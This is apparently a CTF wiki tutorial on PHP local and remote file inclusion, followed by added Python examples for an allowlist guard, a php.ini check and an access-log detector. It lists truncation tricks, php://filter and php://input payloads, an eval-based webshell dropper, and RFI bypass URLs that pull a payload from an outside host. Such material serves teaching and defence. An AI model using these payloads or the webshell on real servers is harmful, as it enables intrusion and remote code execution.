File Inclusion Vulnerabilities
Introduction to file inclusion
When writing an application, developers do not want to write the same code several times, so commonly used code is put in a single file and that file is loaded wherever it is needed instead of being rewritten; this loading is called inclusion. In PHP the file is loaded by an inclusion function that receives a file name. If that file name comes from user input and is not properly validated, an attacker can make the function operate on a file other than the one the developer expected, which leads to unexpected file disclosure or even malicious code injection.
Dangerous functions
The four PHP functions most commonly involved in file inclusion vulnerabilities are:
require()
require_once()
include()
include_once()
When one of these functions includes a file, the file is parsed and executed as PHP as long as its contents follow PHP syntax, regardless of its extension. An uploaded .txt or .jpg file that contains malicious PHP code will therefore be executed as PHP once it is included.
Classification
Local file inclusion
- Read files on the target machine directly, for example the flag file
Remote File Inclusion
- Host a PHP Trojan on a third-party server that you control, include it to obtain a webshell, and then read the flag file
Problem-solving approach
Check the two relevant options in the PHP global configuration file php.ini:
allow_url_fopen = on/off
allow_url_include = on/off
Remote file inclusion is possible only when both of these options are on; local file inclusion does not depend on them.
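The following Python example is added here and is not part of the original wiki page. It shows the two defensive checks this section implies: an allowlist guard that an application should run before passing a user-supplied name to include()/require(), and a small php.ini parser that reports whether the allow_url_fopen/allow_url_include combination permits remote inclusion. The allowlist, the template directory /var/www/app/pages and the php.ini fragments are constructed for the example; the logic is written in Python for clarity, and a PHP guard would take the same steps with in_array() and realpath().

```python
import posixpath

# Constructed allowlist and template directory for this example; a real
# application lists its own includable pages here.
ALLOWED_PAGES = {"home", "about", "contact"}
TEMPLATE_DIR = "/var/www/app/pages"


class IncludeRejected(ValueError):
    """Raised when an untrusted page name must not reach include()."""


def resolve_include(user_value):
    """Map an untrusted ?page= value to the file an include may load.

    The checks mirror what a guard in front of include()/require() should do:
      1. refuse control bytes (defeats the %00 truncation trick),
      2. refuse stream wrappers (php://, file://, http://), path separators
         and traversal,
      3. accept only names from a fixed allowlist and build the path from
         that name, never from the raw input.
    """
    if "\x00" in user_value:
        raise IncludeRejected("null byte in page name")
    if "://" in user_value:
        raise IncludeRejected("stream wrappers are not allowed")
    if "/" in user_value or "\\" in user_value or ".." in user_value:
        raise IncludeRejected("path separators or traversal are not allowed")
    if user_value not in ALLOWED_PAGES:
        raise IncludeRejected("page not in allowlist")
    candidate = posixpath.normpath(posixpath.join(TEMPLATE_DIR, user_value + ".php"))
    # Defence in depth: confirm the canonical path is still inside TEMPLATE_DIR.
    if not candidate.startswith(TEMPLATE_DIR + "/"):
        raise IncludeRejected("resolved path left the template directory")
    return candidate


def is_allowed(user_value):
    """True when resolve_include() accepts the value, False otherwise."""
    try:
        resolve_include(user_value)
        return True
    except IncludeRejected:
        return False


def remote_include_enabled(php_ini_text):
    """Parse php.ini text and report whether remote inclusion is possible,
    i.e. whether both allow_url_fopen and allow_url_include are on."""
    settings = {}
    for line in php_ini_text.splitlines():
        line = line.split(";", 1)[0].strip()  # ';' starts a comment in php.ini
        if "=" in line:
            key, value = (part.strip() for part in line.split("=", 1))
            settings[key.lower()] = value.lower()
    on = {"on", "1", "true", "yes"}
    return settings.get("allow_url_fopen") in on and settings.get("allow_url_include") in on


# Constructed php.ini fragments: the weak setting and the corrected one.
WEAK_INI = "allow_url_fopen = On\nallow_url_include = On\n"
HARDENED_INI = "allow_url_fopen = On\n; remote code must never be include()d\nallow_url_include = Off\n"

if __name__ == "__main__":
    for value in ["about", "../../../../etc/passwd", "about\x00.jpg",
                  "php://filter/convert.base64-encode/resource=index.php",
                  "http://203.0.113.10/php.txt?"]:
        print(repr(value), "->", "allowed" if is_allowed(value) else "rejected")
    print("weak php.ini allows RFI:", remote_include_enabled(WEAK_INI))
    print("hardened php.ini allows RFI:", remote_include_enabled(HARDENED_INI))
```

The allowlist is the check that actually matters: once the included path is built from a fixed name rather than from the request, the wrapper, traversal and null-byte checks are only defence in depth, and allow_url_include should stay off unless the application genuinely needs it.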
Local file inclusion
- Include the flag file directly
- Read the flag out of the source code with a PHP pseudo-protocol (stream wrapper)
- Pass in a PHP Trojan to get a webshell, then get the flag
Include the flag file directly
%00 truncation
Terminator: \x00 -> %00
Path length truncation
On Windows the maximum directory length is 256 bytes and anything beyond it is discarded; on Linux the maximum length is 4096 bytes and anything beyond it is discarded. Example:
http://www.ctfs-wiki.com/FI/FI.php?filename=test.txt/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
Dot truncation
On Windows the number of dots needs to exceed 256.
http://www.ctfs-wiki.com/FI/FI.php?filename=test.txt..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
PHP pseudo-protocols
- file:// - access the local file system
- php:// - access the various input and output streams
file://
Usage: file://[absolute path and file name]
Conditions (php.ini): allow_url_fopen = off/on, allow_url_include = off/on
php://filter
Usage:
?filename=php://filter/convert.base64-encode/resource=xxx.php
Conditions (php.ini): allow_url_fopen = off/on, allow_url_include = off/on
Pass in a PHP Trojan to get a webshell, then get the flag
php://input
Usage: ?file=php://input, with the data passed in the POST body
Conditions (php.ini): allow_url_fopen = off/on, allow_url_include = on
Trojan file (shell.php)
<?PHP fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])?>');?>
Connect with China Chopper (Caidao) / AntSword
Remote File Inclusion
Question mark (?) bypass
http://www.ctfs-wiki.com/FI/WFI.php?filename=http://192.168.91.133/FI/php.txt?
Hash sign (#) bypass
http://www.ctfs-wiki.com/FI/WFI.php?filename=http://192.168.91.133/FI/php.txt%23
%20 bypass
http://www.ctfs-wiki.com/FI/WFI.php?filename=http://192.168.91.133/FI/php.txt%20
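As an added example that is not part of the original page, the following Python script runs a simple detector over constructed access-log lines, one per payload class described above: %00 truncation and path-length/dot truncation, the php:// and file:// wrappers, and remote URLs carrying the ?, # and %20 suffix bypasses. The log lines, client addresses and the host 203.0.113.10 are constructed for the example; the tag names are this example's own.

```python
import re
from urllib.parse import unquote

# Request line inside a common-log-format entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def classify_value(raw_value):
    """Return sorted tags describing inclusion payload patterns in one raw
    (still percent-encoded) query-string value; [] means nothing was seen."""
    decoded = unquote(raw_value)
    tags = set()
    # %00 truncation: a NUL byte placed after the wanted file name.
    if "\x00" in decoded:
        tags.add("null_byte_truncation")
    # Stream wrappers and remote URLs at the start of the value.
    m = re.match(r"([a-z][a-z0-9+.-]*)://", decoded, re.I)
    if m:
        scheme = m.group(1).lower()
        if scheme == "php":
            tags.add("php_wrapper")
        elif scheme == "file":
            tags.add("file_wrapper")
        elif scheme in ("http", "https", "ftp"):
            tags.add("remote_include")
            # Trailing ?, # or space used to neutralise a suffix the script appends.
            if decoded.endswith(("?", "#", " ")):
                tags.add("rfi_suffix_bypass")
    # Directory traversal segments.
    if ".." in decoded.replace("\\", "/").split("/"):
        tags.add("path_traversal")
    # Path-length / dot truncation: hundreds of "/." or a long run of trailing dots.
    if len(decoded) > 256 and (decoded.count("/.") > 20 or re.search(r"\.{200,}$", decoded)):
        tags.add("length_truncation")
    return sorted(tags)


def scan_log(lines):
    """Scan access-log lines; return one finding per suspicious query parameter."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        client_ip = line.split(" ", 1)[0]
        path, _, query = m.group("target").partition("?")
        for pair in query.split("&"):
            key, _, value = pair.partition("=")
            tags = classify_value(value)
            if tags:
                findings.append({"ip": client_ip, "method": m.group("method"),
                                 "path": path, "param": key, "tags": tags})
    return findings


# Constructed access-log lines (not real traffic); 203.0.113.10 is a
# documentation address standing in for the attacker-controlled host.
LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /FI/FI.php?filename=about.php HTTP/1.1" 200 512',
    '10.0.0.6 - - [01/Jan/2024:10:00:01 +0000] "GET /FI/FI.php?filename=../../../../etc/passwd%00 HTTP/1.1" 200 1024',
    '10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /FI/FI.php?filename=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 4096',
    '10.0.0.8 - - [01/Jan/2024:10:00:03 +0000] "POST /FI/FI.php?filename=php://input HTTP/1.1" 200 120',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /FI/WFI.php?filename=http://203.0.113.10/php.txt%23 HTTP/1.1" 200 88',
    '10.0.0.10 - - [01/Jan/2024:10:00:05 +0000] "GET /FI/FI.php?filename=test.txt' + "/." * 300 + ' HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for finding in scan_log(LOG_LINES):
        print(finding["ip"], finding["method"], finding["path"],
              finding["param"], ",".join(finding["tags"]))
```

The detector decodes each value before matching, because the %00, %23 and %20 variants only differ from their raw forms after percent-decoding; the first log line, a plain file name, produces no finding, while each of the other five is tagged with the payload class it carries.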